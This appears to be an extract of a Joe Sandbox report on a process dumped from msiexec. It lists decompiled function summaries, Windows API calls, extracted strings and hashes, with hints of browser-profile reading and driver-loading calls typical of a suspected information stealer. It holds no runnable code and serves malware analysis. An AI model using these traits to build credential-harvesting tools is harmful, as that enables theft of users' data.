                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                    Strings
                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 829165378-0
                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                    • API String ID: 667068680-4123708296
                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 1607361635-601624466
                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1043902810-0
                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                    • Opcode ID: df80599c69b4aaf9201dd24796d4ff43ee5aa3dc5a083fdf397899c78ee02472
                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                    • Opcode Fuzzy Hash: df80599c69b4aaf9201dd24796d4ff43ee5aa3dc5a083fdf397899c78ee02472
                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 3330709923-517860148
                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
